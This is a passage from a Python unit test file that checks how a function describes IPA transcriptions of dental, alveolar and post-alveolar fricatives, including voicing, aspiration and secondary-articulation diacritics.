self.assertEqual(actual, expected)
def test_θ̬_is_the_representation_of_the_voiced_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬")
self.assertEqual(actual, expected)
# voiced labialized dental fricative pulmonic egressive consonant
def test_ðʷ_is_the_representation_of_the_voiced_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʷ")
self.assertEqual(actual, expected)
def test_θ̬ʷ_is_the_representation_of_the_voiced_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized dental fricative pulmonic egressive consonant
def test_ðʲ_is_the_representation_of_the_voiced_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʲ")
self.assertEqual(actual, expected)
def test_θ̬ʲ_is_the_representation_of_the_voiced_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized dental fricative pulmonic egressive consonant
def test_ðˠ_is_the_representation_of_the_voiced_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðˠ")
self.assertEqual(actual, expected)
def test_θ̬ˠ_is_the_representation_of_the_voiced_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized dental fricative pulmonic egressive consonant
def test_ðˤ_is_the_representation_of_the_voiced_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðˤ")
self.assertEqual(actual, expected)
def test_θ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated dental fricative pulmonic egressive consonant
def test_ðʰ_is_the_representation_of_the_voiced_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰ")
self.assertEqual(actual, expected)
def test_ð̬ʰ_is_the_representation_of_the_voiced_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰ")
self.assertEqual(actual, expected)
def test_θ̬ʰ_is_the_representation_of_the_voiced_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized dental fricative pulmonic egressive consonant
def test_ðʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰʷ")
self.assertEqual(actual, expected)
def test_ð̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰʷ")
self.assertEqual(actual, expected)
def test_θ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized dental fricative pulmonic egressive consonant
def test_ðʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰʲ")
self.assertEqual(actual, expected)
def test_ð̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰʲ")
self.assertEqual(actual, expected)
def test_θ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized dental fricative pulmonic egressive consonant
def test_ðʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰˠ")
self.assertEqual(actual, expected)
def test_ð̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰˠ")
self.assertEqual(actual, expected)
def test_θ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized dental fricative pulmonic egressive consonant
def test_ðʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ðʰˤ")
self.assertEqual(actual, expected)
def test_ð̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̬ʰˤ")
self.assertEqual(actual, expected)
def test_θ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̬ʰˤ")
self.assertEqual(actual, expected)
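# The expected strings follow one fixed template: voicing, optional
# "aspirated", optional secondary articulation, then place, manner, and
# the airstream tail. A hypothetical helper (illustrative only, not part
# of the module under test) that rebuilds the dental expectations above:
def _expected_dental_fricative(self, voicing, aspirated=False, secondary=None):
    parts = [voicing]
    if aspirated:
        parts.append("aspirated")
    if secondary is not None:
        parts.append(secondary)  # "labialized", "palatalized", "velarized" or "pharyngealized"
    parts.append("dental fricative pulmonic egressive consonant")
    return " ".join(parts)
# e.g. _expected_dental_fricative("voiced", aspirated=True, secondary="velarized")
# yields "voiced aspirated velarized dental fricative pulmonic egressive consonant".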
# voiceless alveolar fricative pulmonic egressive consonant
def test_s_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s")
self.assertEqual(actual, expected)
def test_s̊_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊")
self.assertEqual(actual, expected)
def test_s̥_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥")
self.assertEqual(actual, expected)
def test_z̊_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊")
self.assertEqual(actual, expected)
def test_z̥_is_the_representation_of_the_voiceless_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar fricative pulmonic egressive consonant
def test_sʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʷ")
self.assertEqual(actual, expected)
def test_s̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊ʷ")
self.assertEqual(actual, expected)
def test_s̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥ʷ")
self.assertEqual(actual, expected)
def test_z̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʷ")
self.assertEqual(actual, expected)
def test_z̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar fricative pulmonic egressive consonant
def test_sʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʲ")
self.assertEqual(actual, expected)
def test_s̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊ʲ")
self.assertEqual(actual, expected)
def test_s̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥ʲ")
self.assertEqual(actual, expected)
def test_z̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʲ")
self.assertEqual(actual, expected)
def test_z̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar fricative pulmonic egressive consonant
def test_sˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sˠ")
self.assertEqual(actual, expected)
def test_s̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊ˠ")
self.assertEqual(actual, expected)
def test_s̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥ˠ")
self.assertEqual(actual, expected)
def test_z̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ˠ")
self.assertEqual(actual, expected)
def test_z̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar fricative pulmonic egressive consonant
def test_sˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sˤ")
self.assertEqual(actual, expected)
def test_s̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̊ˤ")
self.assertEqual(actual, expected)
def test_s̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̥ˤ")
self.assertEqual(actual, expected)
def test_z̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ˤ")
self.assertEqual(actual, expected)
def test_z̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar fricative pulmonic egressive consonant
def test_sʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰ")
self.assertEqual(actual, expected)
def test_z̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰ")
self.assertEqual(actual, expected)
def test_z̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar fricative pulmonic egressive consonant
def test_sʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰʷ")
self.assertEqual(actual, expected)
def test_z̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰʷ")
self.assertEqual(actual, expected)
def test_z̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar fricative pulmonic egressive consonant
def test_sʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰʲ")
self.assertEqual(actual, expected)
def test_z̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰʲ")
self.assertEqual(actual, expected)
def test_z̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar fricative pulmonic egressive consonant
def test_sʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰˠ")
self.assertEqual(actual, expected)
def test_z̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰˠ")
self.assertEqual(actual, expected)
def test_z̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar fricative pulmonic egressive consonant
def test_sʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("sʰˤ")
self.assertEqual(actual, expected)
def test_z̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̥ʰˤ")
self.assertEqual(actual, expected)
def test_z̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar fricative pulmonic egressive consonant
def test_z_is_the_representation_of_the_voiced_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z")
self.assertEqual(actual, expected)
def test_s̬_is_the_representation_of_the_voiced_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬")
self.assertEqual(actual, expected)
# voiced labialized alveolar fricative pulmonic egressive consonant
def test_zʷ_is_the_representation_of_the_voiced_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʷ")
self.assertEqual(actual, expected)
def test_s̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar fricative pulmonic egressive consonant
def test_zʲ_is_the_representation_of_the_voiced_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʲ")
self.assertEqual(actual, expected)
def test_s̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar fricative pulmonic egressive consonant
def test_zˠ_is_the_representation_of_the_voiced_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zˠ")
self.assertEqual(actual, expected)
def test_s̬ˠ_is_the_representation_of_the_voiced_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar fricative pulmonic egressive consonant
def test_zˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zˤ")
self.assertEqual(actual, expected)
def test_s̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar fricative pulmonic egressive consonant
def test_zʰ_is_the_representation_of_the_voiced_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰ")
self.assertEqual(actual, expected)
def test_z̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰ")
self.assertEqual(actual, expected)
def test_s̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar fricative pulmonic egressive consonant
def test_zʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰʷ")
self.assertEqual(actual, expected)
def test_z̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰʷ")
self.assertEqual(actual, expected)
def test_s̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar fricative pulmonic egressive consonant
def test_zʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰʲ")
self.assertEqual(actual, expected)
def test_z̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰʲ")
self.assertEqual(actual, expected)
def test_s̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar fricative pulmonic egressive consonant
def test_zʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰˠ")
self.assertEqual(actual, expected)
def test_z̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰˠ")
self.assertEqual(actual, expected)
def test_s̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar fricative pulmonic egressive consonant
def test_zʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("zʰˤ")
self.assertEqual(actual, expected)
def test_z̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("z̬ʰˤ")
self.assertEqual(actual, expected)
def test_s̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("s̬ʰˤ")
self.assertEqual(actual, expected)
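# The groups above repeat one expected description across several equivalent
# transcriptions. A table-driven alternative using unittest's subTest can
# express such a group in a single method; a minimal sketch over two cases
# taken from the voiced alveolar group above (illustrative, not the full
# inventory):
def test_voiced_alveolar_fricative_variants(self):
    cases = {
        "z": "voiced alveolar fricative pulmonic egressive consonant",
        "s̬": "voiced alveolar fricative pulmonic egressive consonant",
    }
    for transcription, description in cases.items():
        with self.subTest(transcription=transcription):
            self.assertEqual(describe_transcription(transcription), description)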
# voiceless post-alveolar fricative pulmonic egressive consonant
def test_ʃ_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ")
self.assertEqual(actual, expected)
def test_ʃ̊_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊")
self.assertEqual(actual, expected)
def test_ʃ̥_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥")
self.assertEqual(actual, expected)
def test_ʒ̊_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊")
self.assertEqual(actual, expected)
def test_ʒ̥_is_the_representation_of_the_voiceless_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥")
self.assertEqual(actual, expected)
# voiceless labialized post-alveolar fricative pulmonic egressive consonant
def test_ʃʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʷ")
self.assertEqual(actual, expected)
def test_ʃ̊ʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊ʷ")
self.assertEqual(actual, expected)
def test_ʃ̥ʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥ʷ")
self.assertEqual(actual, expected)
def test_ʒ̊ʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʷ")
self.assertEqual(actual, expected)
def test_ʒ̥ʷ_is_the_representation_of_the_voiceless_labialized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized post-alveolar fricative pulmonic egressive consonant
def test_ʃʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃʲ")
self.assertEqual(actual, expected)
def test_ʃ̊ʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊ʲ")
self.assertEqual(actual, expected)
def test_ʃ̥ʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥ʲ")
self.assertEqual(actual, expected)
def test_ʒ̊ʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ʲ")
self.assertEqual(actual, expected)
def test_ʒ̥ʲ_is_the_representation_of_the_voiceless_palatalized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized post-alveolar fricative pulmonic egressive consonant
def test_ʃˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃˠ")
self.assertEqual(actual, expected)
def test_ʃ̊ˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̊ˠ")
self.assertEqual(actual, expected)
def test_ʃ̥ˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʃ̥ˠ")
self.assertEqual(actual, expected)
def test_ʒ̊ˠ_is_the_representation_of_the_voiceless_velarized_post_alveolar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized post-alveolar fricative pulmonic egressive consonant"
actual = describe_transcription("ʒ̊ˠ")
self.assertEqual(actual, expected)
